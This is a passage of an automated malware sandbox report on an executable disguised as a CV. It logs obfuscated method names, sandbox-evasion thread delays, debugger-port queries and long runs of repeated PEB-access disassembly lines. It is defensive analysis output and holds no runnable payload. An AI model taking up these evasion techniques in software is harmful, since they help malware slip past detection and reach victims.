            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, Hpb6sX0m5OuPGE34GK.csHigh entropy of concatenated method names: 's7KIR3bgyQ', 'fYXIacOyoF', 'HjfIst1RPh', 'mFEIDHBaiC', 'kF1ISjR86X', 'yGlI7QU7V0', 'uTcIGuKmkg', 'A1nI0jJwwf', 'K5PIYIRLvH', 'IiAIHOK4Cd'
            Source: 0.2.Curriculum Vitae Catalina Munoz.exe.42dc1a0.2.raw.unpack, DvFq1CsmOfeYK5xheQ.csHigh entropy of concatenated method names: 'Dispose', 'HRNy2iNtIV', 'PWjdcZemIV', 'N1o55Jw110', 'QJKy4Q2Y9R', 'USIyzgGWTN', 'ProcessDialogKey', 'qRadrqlC8u', 'B7YdyhPRjb', 'avXdder5UV'
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\TSTheme.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: Curriculum Vitae Catalina Munoz.exe PID: 4048, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Memory allocated: 2BE0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Memory allocated: 2DF0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Memory allocated: 9000000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Memory allocated: A000000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Memory allocated: A210000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Memory allocated: B210000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Code function: 2_2_0153096E rdtsc 2_2_0153096E
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Thread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Thread delayed: delay time: 239875
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Thread delayed: delay time: 239765
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Thread delayed: delay time: 239656
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Thread delayed: delay time: 239547
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Thread delayed: delay time: 239437
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Thread delayed: delay time: 239328
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Thread delayed: delay time: 239173
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Window / User API: threadDelayed 578
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Window / User API: threadDelayed 614
            Source: C:\Windows\SysWOW64\TSTheme.exe Window / User API: threadDelayed 9813
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\TSTheme.exe API coverage: 2.8 %
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108 Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108 Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 6216 Thread sleep count: 578 > 30
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108 Thread sleep time: -239875s >= -30000s
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 6216 Thread sleep count: 614 > 30
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108 Thread sleep time: -239765s >= -30000s
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108 Thread sleep time: -239656s >= -30000s
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108 Thread sleep time: -239547s >= -30000s
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108 Thread sleep time: -239437s >= -30000s
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108 Thread sleep time: -239328s >= -30000s
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe TID: 5108 Thread sleep time: -239173s >= -30000s
            Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548 Thread sleep count: 158 > 30
            Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548 Thread sleep time: -316000s >= -30000s
            Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548 Thread sleep count: 9813 > 30
            Source: C:\Windows\SysWOW64\TSTheme.exe TID: 7548 Thread sleep time: -19626000s >= -30000s
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604 Thread sleep count: 39 > 30
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604 Thread sleep time: -58500s >= -30000s
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604 Thread sleep count: 41 > 30
            Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe TID: 7604 Thread sleep time: -41000s >= -30000s
            Source: C:\Windows\SysWOW64\TSTheme.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_02FDBE90 FindFirstFileW, FindNextFileW, FindClose, 15_2_02FDBE90
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\TSTheme.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Code function: 2_2_004177F3 LdrLoadDll, 2_2_004177F3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Code function: 2_2_01588158 mov eax, dword ptr fs:[00000030h] 2_2_01588158
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01530185 mov eax, dword ptr fs:[00000030h]2_2_01530185
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EA197 mov eax, dword ptr fs:[00000030h]2_2_014EA197
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EA197 mov eax, dword ptr fs:[00000030h]2_2_014EA197
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EA197 mov eax, dword ptr fs:[00000030h]2_2_014EA197
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01594180 mov eax, dword ptr fs:[00000030h]2_2_01594180
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01594180 mov eax, dword ptr fs:[00000030h]2_2_01594180
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01576050 mov eax, dword ptr fs:[00000030h]2_2_01576050
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F2050 mov eax, dword ptr fs:[00000030h]2_2_014F2050
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151C073 mov eax, dword ptr fs:[00000030h]2_2_0151C073
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0150E016 mov eax, dword ptr fs:[00000030h]2_2_0150E016
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0150E016 mov eax, dword ptr fs:[00000030h]2_2_0150E016
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0150E016 mov eax, dword ptr fs:[00000030h]2_2_0150E016
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0150E016 mov eax, dword ptr fs:[00000030h]2_2_0150E016
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01574000 mov ecx, dword ptr fs:[00000030h]2_2_01574000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01592000 mov eax, dword ptr fs:[00000030h]2_2_01592000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01592000 mov eax, dword ptr fs:[00000030h]2_2_01592000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01592000 mov eax, dword ptr fs:[00000030h]2_2_01592000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01592000 mov eax, dword ptr fs:[00000030h]2_2_01592000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01592000 mov eax, dword ptr fs:[00000030h]2_2_01592000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01592000 mov eax, dword ptr fs:[00000030h]2_2_01592000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01592000 mov eax, dword ptr fs:[00000030h]2_2_01592000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01592000 mov eax, dword ptr fs:[00000030h]2_2_01592000
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01586030 mov eax, dword ptr fs:[00000030h]2_2_01586030
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EA020 mov eax, dword ptr fs:[00000030h]2_2_014EA020
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EC020 mov eax, dword ptr fs:[00000030h]2_2_014EC020
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015720DE mov eax, dword ptr fs:[00000030h]2_2_015720DE
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015320F0 mov ecx, dword ptr fs:[00000030h]2_2_015320F0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F80E9 mov eax, dword ptr fs:[00000030h]2_2_014F80E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EA0E3 mov ecx, dword ptr fs:[00000030h]2_2_014EA0E3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015760E0 mov eax, dword ptr fs:[00000030h]2_2_015760E0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EC0F0 mov eax, dword ptr fs:[00000030h]2_2_014EC0F0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F208A mov eax, dword ptr fs:[00000030h]2_2_014F208A
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B60B8 mov eax, dword ptr fs:[00000030h]2_2_015B60B8
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015B60B8 mov ecx, dword ptr fs:[00000030h]2_2_015B60B8
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014E80A0 mov eax, dword ptr fs:[00000030h]2_2_014E80A0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015880A8 mov eax, dword ptr fs:[00000030h]2_2_015880A8
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015BA352 mov eax, dword ptr fs:[00000030h]2_2_015BA352
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01598350 mov ecx, dword ptr fs:[00000030h]2_2_01598350
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157035C mov eax, dword ptr fs:[00000030h]2_2_0157035C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157035C mov eax, dword ptr fs:[00000030h]2_2_0157035C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157035C mov eax, dword ptr fs:[00000030h]2_2_0157035C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157035C mov ecx, dword ptr fs:[00000030h]2_2_0157035C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157035C mov eax, dword ptr fs:[00000030h]2_2_0157035C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0157035C mov eax, dword ptr fs:[00000030h]2_2_0157035C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C634F mov eax, dword ptr fs:[00000030h]2_2_015C634F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01572349 mov eax, dword ptr fs:[00000030h]2_2_01572349
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159437C mov eax, dword ptr fs:[00000030h]2_2_0159437C
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01510310 mov ecx, dword ptr fs:[00000030h]2_2_01510310
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152A30B mov eax, dword ptr fs:[00000030h]2_2_0152A30B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152A30B mov eax, dword ptr fs:[00000030h]2_2_0152A30B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0152A30B mov eax, dword ptr fs:[00000030h]2_2_0152A30B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EC310 mov ecx, dword ptr fs:[00000030h]2_2_014EC310
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C8324 mov eax, dword ptr fs:[00000030h]2_2_015C8324
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C8324 mov ecx, dword ptr fs:[00000030h]2_2_015C8324
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C8324 mov eax, dword ptr fs:[00000030h]2_2_015C8324
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C8324 mov eax, dword ptr fs:[00000030h]2_2_015C8324
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159E3DB mov eax, dword ptr fs:[00000030h]2_2_0159E3DB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159E3DB mov eax, dword ptr fs:[00000030h]2_2_0159E3DB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159E3DB mov ecx, dword ptr fs:[00000030h]2_2_0159E3DB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0159E3DB mov eax, dword ptr fs:[00000030h]2_2_0159E3DB
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015943D4 mov eax, dword ptr fs:[00000030h]2_2_015943D4
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015943D4 mov eax, dword ptr fs:[00000030h]2_2_015943D4
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA3C0 mov eax, dword ptr fs:[00000030h]2_2_014FA3C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA3C0 mov eax, dword ptr fs:[00000030h]2_2_014FA3C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA3C0 mov eax, dword ptr fs:[00000030h]2_2_014FA3C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA3C0 mov eax, dword ptr fs:[00000030h]2_2_014FA3C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA3C0 mov eax, dword ptr fs:[00000030h]2_2_014FA3C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA3C0 mov eax, dword ptr fs:[00000030h]2_2_014FA3C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F83C0 mov eax, dword ptr fs:[00000030h]2_2_014F83C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F83C0 mov eax, dword ptr fs:[00000030h]2_2_014F83C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F83C0 mov eax, dword ptr fs:[00000030h]2_2_014F83C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F83C0 mov eax, dword ptr fs:[00000030h]2_2_014F83C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015AC3CD mov eax, dword ptr fs:[00000030h]2_2_015AC3CD
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015763C0 mov eax, dword ptr fs:[00000030h]2_2_015763C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0150E3F0 mov eax, dword ptr fs:[00000030h]2_2_0150E3F0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0150E3F0 mov eax, dword ptr fs:[00000030h]2_2_0150E3F0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0150E3F0 mov eax, dword ptr fs:[00000030h]2_2_0150E3F0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015263FF mov eax, dword ptr fs:[00000030h]2_2_015263FF
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015003E9 mov eax, dword ptr fs:[00000030h]2_2_015003E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015003E9 mov eax, dword ptr fs:[00000030h]2_2_015003E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015003E9 mov eax, dword ptr fs:[00000030h]2_2_015003E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015003E9 mov eax, dword ptr fs:[00000030h]2_2_015003E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015003E9 mov eax, dword ptr fs:[00000030h]2_2_015003E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015003E9 mov eax, dword ptr fs:[00000030h]2_2_015003E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015003E9 mov eax, dword ptr fs:[00000030h]2_2_015003E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015003E9 mov eax, dword ptr fs:[00000030h]2_2_015003E9
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EE388 mov eax, dword ptr fs:[00000030h]2_2_014EE388
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EE388 mov eax, dword ptr fs:[00000030h]2_2_014EE388
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EE388 mov eax, dword ptr fs:[00000030h]2_2_014EE388
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014E8397 mov eax, dword ptr fs:[00000030h]2_2_014E8397
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014E8397 mov eax, dword ptr fs:[00000030h]2_2_014E8397
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014E8397 mov eax, dword ptr fs:[00000030h]2_2_014E8397
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151438F mov eax, dword ptr fs:[00000030h]2_2_0151438F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0151438F mov eax, dword ptr fs:[00000030h]2_2_0151438F
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C625D mov eax, dword ptr fs:[00000030h]2_2_015C625D
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015AA250 mov eax, dword ptr fs:[00000030h]2_2_015AA250
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015AA250 mov eax, dword ptr fs:[00000030h]2_2_015AA250
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01578243 mov eax, dword ptr fs:[00000030h]2_2_01578243
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01578243 mov ecx, dword ptr fs:[00000030h]2_2_01578243
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F6259 mov eax, dword ptr fs:[00000030h]2_2_014F6259
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014EA250 mov eax, dword ptr fs:[00000030h]2_2_014EA250
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014E826B mov eax, dword ptr fs:[00000030h]2_2_014E826B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015A0274 mov eax, dword ptr fs:[00000030h]2_2_015A0274
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F4260 mov eax, dword ptr fs:[00000030h]2_2_014F4260
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F4260 mov eax, dword ptr fs:[00000030h]2_2_014F4260
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014F4260 mov eax, dword ptr fs:[00000030h]2_2_014F4260
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014E823B mov eax, dword ptr fs:[00000030h]2_2_014E823B
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015C62D6 mov eax, dword ptr fs:[00000030h]2_2_015C62D6
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA2C3 mov eax, dword ptr fs:[00000030h]2_2_014FA2C3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA2C3 mov eax, dword ptr fs:[00000030h]2_2_014FA2C3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA2C3 mov eax, dword ptr fs:[00000030h]2_2_014FA2C3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA2C3 mov eax, dword ptr fs:[00000030h]2_2_014FA2C3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_014FA2C3 mov eax, dword ptr fs:[00000030h]2_2_014FA2C3
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015002E1 mov eax, dword ptr fs:[00000030h]2_2_015002E1
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015002E1 mov eax, dword ptr fs:[00000030h]2_2_015002E1
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015002E1 mov eax, dword ptr fs:[00000030h]2_2_015002E1
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01570283 mov eax, dword ptr fs:[00000030h]2_2_01570283
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01570283 mov eax, dword ptr fs:[00000030h]2_2_01570283
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01570283 mov eax, dword ptr fs:[00000030h]2_2_01570283
